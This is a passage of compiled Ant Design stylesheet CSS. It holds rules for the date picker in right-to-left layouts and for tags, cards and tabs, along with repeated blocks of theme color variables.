.ant-picker-cell-in-view.ant-picker-cell-start.ant-picker-cell-range-hover-edge-start.ant-picker-cell-range-hover-edge-start-near-range::after, .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-range-hover-edge-start:not(.ant-picker-cell-range-hover-edge-start-near-range)::after, .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-range-hover-start::after { right: 6px; left: 0; border-right: 1px dashed var(--ant-primary-color-deprecated-l-20); border-left: none; border-radius: 0 2px 2px 0; } .ant-picker-panel-rtl tr > .ant-picker-cell-in-view.ant-picker-cell-range-hover:not(.ant-picker-cell-selected):last-child::after, .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-end.ant-picker-cell-range-hover-edge-end.ant-picker-cell-range-hover-edge-end-near-range::after, .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-range-hover-edge-end:not(.ant-picker-cell-range-hover-edge-end-near-range)::after, .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-range-hover-end::after { right: 0; left: 6px; border-right: none; border-left: 1px dashed var(--ant-primary-color-deprecated-l-20); border-radius: 2px 0 0 2px; } .ant-picker-panel-rtl tr > .ant-picker-cell-in-view.ant-picker-cell-range-hover-start:last-child::after, .ant-picker-panel-rtl tr > .ant-picker-cell-in-view.ant-picker-cell-range-hover-end:first-child::after, .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-start.ant-picker-cell-range-hover-edge-start:not(.ant-picker-cell-range-hover)::after, .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-start.ant-picker-cell-range-hover-end.ant-picker-cell-range-hover-edge-start:not(.ant-picker-cell-range-hover)::after, .ant-picker-panel-rtl .ant-picker-cell-in-view.ant-picker-cell-end.ant-picker-cell-range-hover-start.ant-picker-cell-range-hover-edge-end:not(.ant-picker-cell-range-hover)::after, .ant-picker-panel-rtl tr > .ant-picker-cell-in-view.ant-picker-cell-start.ant-picker-cell-range-hover.ant-picker-cell-range-hover-edge-start:last-child::after, .ant-picker-panel-rtl tr > .ant-picker-cell-in-view.ant-picker-cell-end.ant-picker-cell-range-hover.ant-picker-cell-range-hover-edge-end:first-child::after { right: 6px; left: 6px; border-right: 1px dashed var(--ant-primary-color-deprecated-l-20); border-left: 1px dashed var(--ant-primary-color-deprecated-l-20); border-radius: 2px; } .ant-picker-dropdown-rtl .ant-picker-footer-extra { direction: rtl; text-align: right; } .ant-picker-panel-rtl .ant-picker-time-panel { direction: ltr; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-tag { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-block; height: auto; margin-right: 8px; padding: 0 7px; font-size: 12px; line-height: 20px; white-space: nowrap; background: #fafafa; border: 1px solid #d9d9d9; border-radius: 2px; opacity: 1; transition: all 0.3s; } .ant-tag, .ant-tag a, .ant-tag a:hover { color: rgba(0, 0, 0, 0.85); } .ant-tag > a:first-child:last-child { display: inline-block; margin: 0 -8px; padding: 0 8px; } .ant-tag-close-icon { margin-left: 3px; color: rgba(0, 0, 0, 0.45); font-size: 10px; cursor: pointer; transition: all 0.3s; } .ant-tag-close-icon:hover { color: rgba(0, 0, 0, 0.85); } .ant-tag-has-color { border-color: transparent; } .ant-tag-has-color, .ant-tag-has-color a, .ant-tag-has-color a:hover, .ant-tag-has-color .anticon-close, .ant-tag-has-color .anticon-close:hover { color: #fff; } .ant-tag-checkable { background-color: transparent; border-color: transparent; cursor: pointer; } .ant-tag-checkable:not(.ant-tag-checkable-checked):hover { color: var(--ant-primary-color); } .ant-tag-checkable:active, .ant-tag-checkable-checked { color: #fff; } .ant-tag-checkable-checked { background-color: var(--ant-primary-6); } .ant-tag-checkable:active { background-color: var(--ant-primary-7); } .ant-tag-hidden { display: none; } .ant-tag-pink { color: #c41d7f; background: #fff0f6; border-color: #ffadd2; } .ant-tag-pink-inverse { color: #fff; background: #eb2f96; border-color: #eb2f96; } .ant-tag-magenta { color: #c41d7f; background: #fff0f6; border-color: #ffadd2; } .ant-tag-magenta-inverse { color: #fff; background: #eb2f96; border-color: #eb2f96; } .ant-tag-red { color: #cf1322; background: #fff1f0; border-color: #ffa39e; } .ant-tag-red-inverse { color: #fff; background: #f5222d; border-color: #f5222d; } .ant-tag-volcano { color: #d4380d; background: #fff2e8; border-color: #ffbb96; } .ant-tag-volcano-inverse { color: #fff; background: #fa541c; border-color: #fa541c; } .ant-tag-orange { color: #d46b08; background: #fff7e6; border-color: #ffd591; } .ant-tag-orange-inverse { color: #fff; background: #fa8c16; border-color: #fa8c16; } .ant-tag-yellow { color: #d4b106; background: #feffe6; border-color: #fffb8f; } .ant-tag-yellow-inverse { color: #fff; background: #fadb14; border-color: #fadb14; } .ant-tag-gold { color: #d48806; background: #fffbe6; border-color: #ffe58f; } .ant-tag-gold-inverse { color: #fff; background: #faad14; border-color: #faad14; } .ant-tag-cyan { color: #08979c; background: #e6fffb; border-color: #87e8de; } .ant-tag-cyan-inverse { color: #fff; background: #13c2c2; border-color: #13c2c2; } .ant-tag-lime { color: #7cb305; background: #fcffe6; border-color: #eaff8f; } .ant-tag-lime-inverse { color: #fff; background: #a0d911; border-color: #a0d911; } .ant-tag-green { color: #389e0d; background: #f6ffed; border-color: #b7eb8f; } .ant-tag-green-inverse { color: #fff; background: #52c41a; border-color: #52c41a; } .ant-tag-blue { color: #096dd9; background: #e6f7ff; border-color: #91d5ff; } .ant-tag-blue-inverse { color: #fff; background: #1890ff; border-color: #1890ff; } .ant-tag-geekblue { color: #1d39c4; background: #f0f5ff; border-color: #adc6ff; } .ant-tag-geekblue-inverse { color: #fff; background: #2f54eb; border-color: #2f54eb; } .ant-tag-purple { color: #531dab; background: #f9f0ff; border-color: #d3adf7; } .ant-tag-purple-inverse { color: #fff; background: #722ed1; border-color: #722ed1; } .ant-tag-success { color: var(--ant-success-color); background: var(--ant-success-color-deprecated-bg); border-color: var(--ant-success-color-deprecated-border); } .ant-tag-processing { color: var(--ant-info-color); background: var(--ant-info-color-deprecated-bg); border-color: var(--ant-info-color-deprecated-border); } .ant-tag-error { color: var(--ant-error-color); background: var(--ant-error-color-deprecated-bg); border-color: var(--ant-error-color-deprecated-border); } .ant-tag-warning { color: var(--ant-warning-color); background: var(--ant-warning-color-deprecated-bg); border-color: var(--ant-warning-color-deprecated-border); } .ant-tag > .anticon + span, .ant-tag > span + .anticon { margin-left: 7px; } .ant-tag.ant-tag-rtl { margin-right: 0; margin-left: 8px; direction: rtl; text-align: right; } .ant-tag-rtl .ant-tag-close-icon { margin-right: 3px; margin-left: 0; } .ant-tag-rtl.ant-tag > .anticon + span, .ant-tag-rtl.ant-tag > span + .anticon { margin-right: 7px; margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-card { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; background: #fff; border-radius: 2px; } .ant-card-rtl { direction: rtl; } .ant-card-hoverable { cursor: pointer; transition: box-shadow 0.3s, border-color 0.3s; } .ant-card-hoverable:hover { border-color: transparent; box-shadow: 0 1px 2px -2px rgba(0, 0, 0, 0.16), 0 3px 6px 0 rgba(0, 0, 0, 0.12), 0 5px 12px 4px rgba(0, 0, 0, 0.09); } .ant-card-bordered { border: 1px solid #f0f0f0; } .ant-card-head { min-height: 48px; margin-bottom: -1px; padding: 0 24px; color: rgba(0, 0, 0, 0.85); font-weight: 500; font-size: 16px; background: transparent; border-bottom: 1px solid #f0f0f0; border-radius: 2px 2px 0 0; } .ant-card-head::before { display: table; content: ''; } .ant-card-head::after { display: table; clear: both; content: ''; } .ant-card-head-wrapper { display: flex; align-items: center; } .ant-card-head-title { display: inline-block; flex: 1; padding: 16px 0; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } .ant-card-head-title > .ant-typography, .ant-card-head-title > .ant-typography-edit-content { left: 0; margin-top: 0; margin-bottom: 0; } .ant-card-head .ant-tabs-top { clear: both; margin-bottom: -17px; color: rgba(0, 0, 0, 0.85); font-weight: normal; font-size: 14px; } .ant-card-head .ant-tabs-top-bar { border-bottom: 1px solid #f0f0f0; } .ant-card-extra { float: right; margin-left: auto; padding: 16px 0; color: rgba(0, 0, 0, 0.85); font-weight: normal; font-size: 14px; } .ant-card-rtl .ant-card-extra { margin-right: auto; margin-left: 0; } .ant-card-body { padding: 24px; } .ant-card-body::before { display: table; content: ''; } .ant-card-body::after { display: table; clear: both; content: ''; } .ant-card-contain-grid:not(.ant-card-loading) .ant-card-body { margin: -1px 0 0 -1px; padding: 0; } .ant-card-grid { float: left; width: 33.33%; padding: 24px; border: 0; border-radius: 0; box-shadow: 1px 0 0 0 #f0f0f0, 0 1px 0 0 #f0f0f0, 1px 1px 0 0 #f0f0f0, 1px 0 0 0 #f0f0f0 inset, 0 1px 0 0 #f0f0f0 inset; transition: all 0.3s; } .ant-card-rtl .ant-card-grid { float: right; } .ant-card-grid-hoverable:hover { position: relative; z-index: 1; box-shadow: 0 1px 2px -2px rgba(0, 0, 0, 0.16), 0 3px 6px 0 rgba(0, 0, 0, 0.12), 0 5px 12px 4px rgba(0, 0, 0, 0.09); } .ant-card-contain-tabs > .ant-card-head .ant-card-head-title { min-height: 32px; padding-bottom: 0; } .ant-card-contain-tabs > .ant-card-head .ant-card-extra { padding-bottom: 0; } .ant-card-bordered .ant-card-cover { margin-top: -1px; margin-right: -1px; margin-left: -1px; } .ant-card-cover > * { display: block; width: 100%; } .ant-card-cover img { border-radius: 2px 2px 0 0; } .ant-card-actions { margin: 0; padding: 0; list-style: none; background: #fff; border-top: 1px solid #f0f0f0; } .ant-card-actions::before { display: table; content: ''; } .ant-card-actions::after { display: table; clear: both; content: ''; } .ant-card-actions > li { float: left; margin: 12px 0; color: rgba(0, 0, 0, 0.45); text-align: center; } .ant-card-rtl .ant-card-actions > li { float: right; } .ant-card-actions > li > span { position: relative; display: block; min-width: 32px; font-size: 14px; line-height: 1.5715; cursor: pointer; } .ant-card-actions > li > span:hover { color: var(--ant-primary-color); transition: color 0.3s; } .ant-card-actions > li > span a:not(.ant-btn), .ant-card-actions > li > span > .anticon { display: inline-block; width: 100%; color: rgba(0, 0, 0, 0.45); line-height: 22px; transition: color 0.3s; } .ant-card-actions > li > span a:not(.ant-btn):hover, .ant-card-actions > li > span > .anticon:hover { color: var(--ant-primary-color); } .ant-card-actions > li > span > .anticon { font-size: 16px; line-height: 22px; } .ant-card-actions > li:not(:last-child) { border-right: 1px solid #f0f0f0; } .ant-card-rtl .ant-card-actions > li:not(:last-child) { border-right: none; border-left: 1px solid #f0f0f0; } .ant-card-type-inner .ant-card-head { padding: 0 24px; background: #fafafa; } .ant-card-type-inner .ant-card-head-title { padding: 12px 0; font-size: 14px; } .ant-card-type-inner .ant-card-body { padding: 16px 24px; } .ant-card-type-inner .ant-card-extra { padding: 13.5px 0; } .ant-card-meta { margin: -4px 0; } .ant-card-meta::before { display: table; content: ''; } .ant-card-meta::after { display: table; clear: both; content: ''; } .ant-card-meta-avatar { float: left; padding-right: 16px; } .ant-card-rtl .ant-card-meta-avatar { float: right; padding-right: 0; padding-left: 16px; } .ant-card-meta-detail { overflow: hidden; } .ant-card-meta-detail > div:not(:last-child) { margin-bottom: 8px; } .ant-card-meta-title { overflow: hidden; color: rgba(0, 0, 0, 0.85); font-weight: 500; font-size: 16px; white-space: nowrap; text-overflow: ellipsis; } .ant-card-meta-description { color: rgba(0, 0, 0, 0.45); } .ant-card-loading { overflow: hidden; } .ant-card-loading .ant-card-body { -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-card-loading-content p { margin: 0; } .ant-card-loading-block { height: 14px; margin: 4px 0; background: linear-gradient(90deg, rgba(207, 216, 220, 0.2), rgba(207, 216, 220, 0.4), rgba(207, 216, 220, 0.2)); background-size: 600% 600%; border-radius: 2px; -webkit-animation: card-loading 1.4s ease infinite; animation: card-loading 1.4s ease infinite; } @-webkit-keyframes card-loading { 0%, 100% { background-position: 0 50%; } 50% { background-position: 100% 50%; } } @keyframes card-loading { 0%, 100% { background-position: 0 50%; } 50% { background-position: 100% 50%; } } .ant-card-small > .ant-card-head { min-height: 36px; padding: 0 12px; font-size: 14px; } .ant-card-small > .ant-card-head > .ant-card-head-wrapper > .ant-card-head-title { padding: 8px 0; } .ant-card-small > .ant-card-head > .ant-card-head-wrapper > .ant-card-extra { padding: 8px 0; font-size: 14px; } .ant-card-small > .ant-card-body { padding: 12px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-tabs-small > .ant-tabs-nav .ant-tabs-tab { padding: 8px 0; font-size: 14px; } .ant-tabs-large > .ant-tabs-nav .ant-tabs-tab { padding: 16px 0; font-size: 16px; } .ant-tabs-card.ant-tabs-small > .ant-tabs-nav .ant-tabs-tab { padding: 6px 16px; } .ant-tabs-card.ant-tabs-large > .ant-tabs-nav .ant-tabs-tab { padding: 7px 16px 6px; } .ant-tabs-rtl { direction: rtl; } .ant-tabs-rtl .ant-tabs-nav .ant-tabs-tab { margin: 0 0 0 32px; } .ant-tabs-rtl .ant-tabs-nav .ant-tabs-tab:last-of-type { margin-left: 0; } .ant-tabs-rtl .ant-tabs-nav .ant-tabs-tab .anticon { margin-right: 0; margin-left: 12px; } .ant-tabs-rtl .ant-tabs-nav .ant-tabs-tab .ant-tabs-tab-remove { margin-right: 8px; margin-left: -4px; } .ant-tabs-rtl .ant-tabs-nav .ant-tabs-tab .ant-tabs-tab-remove .anticon { margin: 0; } .ant-tabs-rtl.ant-tabs-left > .ant-tabs-nav { order: 1; } .ant-tabs-rtl.ant-tabs-left > .ant-tabs-content-holder { order: 0; } .ant-tabs-rtl.ant-tabs-right > .ant-tabs-nav { order: 0; } .ant-tabs-rtl.ant-tabs-right > .ant-tabs-content-holder { order: 1; } .ant-tabs-rtl.ant-tabs-card.ant-tabs-top > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-rtl.ant-tabs-card.ant-tabs-bottom > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-rtl.ant-tabs-card.ant-tabs-top > div > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-rtl.ant-tabs-card.ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab { margin-right: 2px; margin-left: 0; } .ant-tabs-rtl.ant-tabs-card.ant-tabs-top > .ant-tabs-nav .ant-tabs-nav-add, .ant-tabs-rtl.ant-tabs-card.ant-tabs-bottom > .ant-tabs-nav .ant-tabs-nav-add, .ant-tabs-rtl.ant-tabs-card.ant-tabs-top > div > .ant-tabs-nav .ant-tabs-nav-add, .ant-tabs-rtl.ant-tabs-card.ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-nav-add { margin-right: 2px; margin-left: 0; } .ant-tabs-dropdown-rtl { direction: rtl; } .ant-tabs-dropdown-rtl .ant-tabs-dropdown-menu-item { text-align: right; } .ant-tabs-top, .ant-tabs-bottom { flex-direction: column; } .ant-tabs-top > .ant-tabs-nav, .ant-tabs-bottom > .ant-tabs-nav, .ant-tabs-top > div > .ant-tabs-nav, .ant-tabs-bottom > div > .ant-tabs-nav { margin: 0 0 16px 0; } .ant-tabs-top > .ant-tabs-nav::before, .ant-tabs-bottom > .ant-tabs-nav::before, .ant-tabs-top > div > .ant-tabs-nav::before, .ant-tabs-bottom > div > .ant-tabs-nav::before { position: absolute; right: 0; left: 0; border-bottom: 1px solid #f0f0f0; content: ''; } .ant-tabs-top > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-bottom > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-top > div > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-ink-bar { height: 2px; } .ant-tabs-top > .ant-tabs-nav .ant-tabs-ink-bar-animated, .ant-tabs-bottom > .ant-tabs-nav .ant-tabs-ink-bar-animated, .ant-tabs-top > div > .ant-tabs-nav .ant-tabs-ink-bar-animated, .ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-ink-bar-animated { transition: width 0.3s, left 0.3s, right 0.3s; } .ant-tabs-top > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-bottom > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-top > div > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-top > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-bottom > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-top > div > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-nav-wrap::after { top: 0; bottom: 0; width: 30px; } .ant-tabs-top > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-bottom > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-top > div > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-nav-wrap::before { left: 0; box-shadow: inset 10px 0 8px -8px rgba(0, 0, 0, 0.08); } .ant-tabs-top > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-bottom > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-top > div > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-nav-wrap::after { right: 0; box-shadow: inset -10px 0 8px -8px rgba(0, 0, 0, 0.08); } .ant-tabs-top > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-left::before, .ant-tabs-bottom > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-left::before, .ant-tabs-top > div > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-left::before, .ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-left::before { opacity: 1; } .ant-tabs-top > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-right::after, .ant-tabs-bottom > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-right::after, .ant-tabs-top > div > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-right::after, .ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-right::after { opacity: 1; } .ant-tabs-top > .ant-tabs-nav::before, .ant-tabs-top > div > .ant-tabs-nav::before { bottom: 0; } .ant-tabs-top > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-top > div > .ant-tabs-nav .ant-tabs-ink-bar { bottom: 0; } .ant-tabs-bottom > .ant-tabs-nav, .ant-tabs-bottom > div > .ant-tabs-nav { order: 1; margin-top: 16px; margin-bottom: 0; } .ant-tabs-bottom > .ant-tabs-nav::before, .ant-tabs-bottom > div > .ant-tabs-nav::before { top: 0; } .ant-tabs-bottom > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-bottom > div > .ant-tabs-nav .ant-tabs-ink-bar { top: 0; } .ant-tabs-bottom > .ant-tabs-content-holder, .ant-tabs-bottom > div > .ant-tabs-content-holder { order: 0; } .ant-tabs-left > .ant-tabs-nav, .ant-tabs-right > .ant-tabs-nav, .ant-tabs-left > div > .ant-tabs-nav, .ant-tabs-right > div > .ant-tabs-nav { flex-direction: column; min-width: 50px; } .ant-tabs-left > .ant-tabs-nav .ant-tabs-tab, .ant-tabs-right > .ant-tabs-nav .ant-tabs-tab, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-tab, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-tab { padding: 8px 24px; text-align: center; } .ant-tabs-left > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-right > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-tab + .ant-tabs-tab { margin: 16px 0 0 0; } .ant-tabs-left > .ant-tabs-nav .ant-tabs-nav-wrap, .ant-tabs-right > .ant-tabs-nav .ant-tabs-nav-wrap, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-nav-wrap, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-nav-wrap { flex-direction: column; } .ant-tabs-left > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-right > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-left > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-right > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-nav-wrap::after { right: 0; left: 0; height: 30px; } .ant-tabs-left > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-right > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-nav-wrap::before, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-nav-wrap::before { top: 0; box-shadow: inset 0 10px 8px -8px rgba(0, 0, 0, 0.08); } .ant-tabs-left > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-right > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-nav-wrap::after, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-nav-wrap::after { bottom: 0; box-shadow: inset 0 -10px 8px -8px rgba(0, 0, 0, 0.08); } .ant-tabs-left > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-top::before, .ant-tabs-right > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-top::before, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-top::before, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-top::before { opacity: 1; } .ant-tabs-left > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-bottom::after, .ant-tabs-right > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-bottom::after, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-bottom::after, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-nav-wrap.ant-tabs-nav-wrap-ping-bottom::after { opacity: 1; } .ant-tabs-left > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-right > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-ink-bar, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-ink-bar { width: 2px; } .ant-tabs-left > .ant-tabs-nav .ant-tabs-ink-bar-animated, .ant-tabs-right > .ant-tabs-nav .ant-tabs-ink-bar-animated, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-ink-bar-animated, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-ink-bar-animated { transition: height 0.3s, top 0.3s; } .ant-tabs-left > .ant-tabs-nav .ant-tabs-nav-list, .ant-tabs-right > .ant-tabs-nav .ant-tabs-nav-list, .ant-tabs-left > div > .ant-tabs-nav .ant-tabs-nav-list, .ant-tabs-right > div > .ant-tabs-nav .ant-tabs-nav-list, .ant-tabs-left > .ant-tabs-nav .ant-tabs-nav-operations, .ant-tabs-right > .ant-tabs-nav .ant-tabs-nav-operations, .ant-tabs-left > div > 